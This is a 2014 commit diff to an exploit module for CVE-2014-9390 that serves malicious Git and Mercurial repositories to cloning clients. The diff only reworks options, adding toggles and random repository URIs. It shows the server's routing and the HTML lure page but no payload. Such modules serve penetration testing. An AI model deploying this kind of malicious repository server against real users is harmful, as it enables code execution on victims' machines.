Use random URIs by default, different method for enabling/disabling Git/Mercurial

jhart-r7 · jhart-r7 · commit 8e57688f0431 · 2014-12-23T09:39:39.000-08:00
diff --git a/modules/exploits/multi/http/cve_2014_9390.rb b/modules/exploits/multi/http/cve_2014_9390.rb
@@ -83,14 +83,16 @@ def initialize(info = {})
 
     register_options(
       [
-        OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty to disable)', '/git']),
-        OptString.new('MERCURIAL_URI', [false, 'The URI to use as the malicious Mercurial instance (empty to disable)', '']),
-        OptString.new('URIPATH', [true, 'The URI to display the malicious repositories in', '/'])
+        OptBool.new('GIT', [true, 'Exploit Git clients', true]),
+        OptBool.new('MERCURIAL', [true, 'Exploit Mercurial clients', false]),
+        #OptString.new('URIPATH', [true, 'The URI to display the malicious repositories in', '/'])
       ]
     )
 
     register_advanced_options(
       [
+        OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty for random)', '']),
+        OptString.new('MERCURIAL_URI', [false, 'The URI to use as the malicious Mercurial instance (empty for random)', '']),
         OptString.new('GIT_HOOK', [false, 'The Git hook to use for exploitation', 'post-checkout']),
         OptString.new('MERCURIAL_HOOK', [false, 'The Mercurial hook to use for exploitation', 'update'])
       ]
@@ -102,18 +104,21 @@ def setup
       git: { files: {}, trigger: nil },
       mercurial: { files: {}, trigger: nil }
     }
-    if git_uri.blank? && mercurial_uri.blank?
-      fail_with(Exploit::Failure::BadConfig, 'Must specify at least one non-blank GIT_URI or MERCURIAL_URI')
+
+    unless datastore['GIT'] || datastore['MERCURIAL']
+      fail_with(Exploit::Failure::BadConfig, 'Must specify at least one GIT and/or MERCURIAL')
     end
-    setup_git unless git_uri.blank?
-    setup_mercurial unless mercurial_uri.blank?
+    setup_git
+    setup_mercurial
 
     super
   end
 
   def setup_git
+    return unless datastore['GIT']
     # URI must start with a /
-    unless git_uri =~ /^\//
+    puts "FOOO #{git_uri}"
+    unless git_uri && git_uri =~ /^\//
       fail_with(Exploit::Failure::BadConfig, 'GIT_URI must start with a /')
     end
     # sanity check the malicious hook:
@@ -194,8 +199,9 @@ def setup_git
   end
 
   def setup_mercurial
+    return unless datastore['MERCURIAL']
     # URI must start with a /
-    unless mercurial_uri =~ /^\//
+    unless mercurial_uri && mercurial_uri =~ /^\//
       fail_with(Exploit::Failure::BadConfig, 'MERCURIAL_URI must start with a /')
     end
     # sanity check the malicious hook
@@ -232,18 +238,18 @@ def exploit
 
   def primer
     # add the git and mercurial URIs as necessary
-    hardcoded_uripath(git_uri) unless git_uri.blank?
-    hardcoded_uripath(mercurial_uri) unless mercurial_uri.blank?
+    hardcoded_uripath(git_uri) if datastore['GIT']
+    hardcoded_uripath(mercurial_uri) if datastore['MERCURIAL']
   end
 
   def on_request_uri(cli, req)
     # if the URI is one of our repositories and the user-agent is that of git/mercurial
     # send back the appropriate data, otherwise just show the HTML version
     if (user_agent = req.headers['User-Agent'])
-      if user_agent =~ /^git\// && req.uri.start_with?(git_uri) && !git_uri.blank?
+      if datastore['GIT'] && user_agent =~ /^git\// && req.uri.start_with?(git_uri)
         do_git(cli, req)
         return
-      elsif user_agent =~ /^mercurial\// && req.uri.start_with?(mercurial_uri) && !mercurial_uri.blank?
+      elsif datastore['MERCURIAL'] && user_agent =~ /^mercurial\// && req.uri.start_with?(mercurial_uri)
         do_mercurial(cli, req)
         return
       end
@@ -282,18 +288,18 @@ def do_html(cli, _req)
         <ul>
 HTML
 
-    if git_uri.blank?
-      resp.body << "<li><a>Git</a> (currently offline)</li>"
-    else
+    if datastore['GIT']
       this_git_uri = URI.parse(get_uri).merge(git_uri)
       resp.body << "<li><a href=#{git_uri}>Git</a> (clone with `git clone #{this_git_uri}`)</li>"
+    else
+      resp.body << "<li><a>Git</a> (currently offline)</li>"
     end
 
-    if mercurial_uri.blank?
-      resp.body << "<li><a>Mercurial</a> (currently offline)</li>"
-    else
+    if datastore['MERCURIAL']
       this_mercurial_uri = URI.parse(get_uri).merge(mercurial_uri)
       resp.body << "<li><a href=#{mercurial_uri}>Mercurial</a> (clone with `hg clone #{this_mercurial_uri}`)</li>"
+    else
+      resp.body << "<li><a>Mercurial</a> (currently offline)</li>"
     end
     resp.body << <<HTML
         </ul>
@@ -327,11 +333,23 @@ def do_mercurial(cli, req)
     end
   end
 
+  # Returns the value of GIT_URI if not blank, otherwise returns a random .git URI
   def git_uri
-    datastore['GIT_URI']
+    return @git_uri if @git_uri
+    if datastore['GIT_URI'].blank?
+      @git_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 2).downcase + '.git'
+    else
+      @git_uri = datastore['GIT_URI']
+    end
   end
 
+  # Returns the value of MERCURIAL_URI if not blank, otherwise returns a random URI
   def mercurial_uri
-    datastore['MERCURIAL_URI']
+    return @mercurial_uri if @mercurial_uri
+    if datastore['MERCURIAL_URI'].blank?
+      @mercurial_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 6).downcase
+    else
+      @mercurial_uri = datastore['MERCURIAL_URI']
+    end
   end
 end
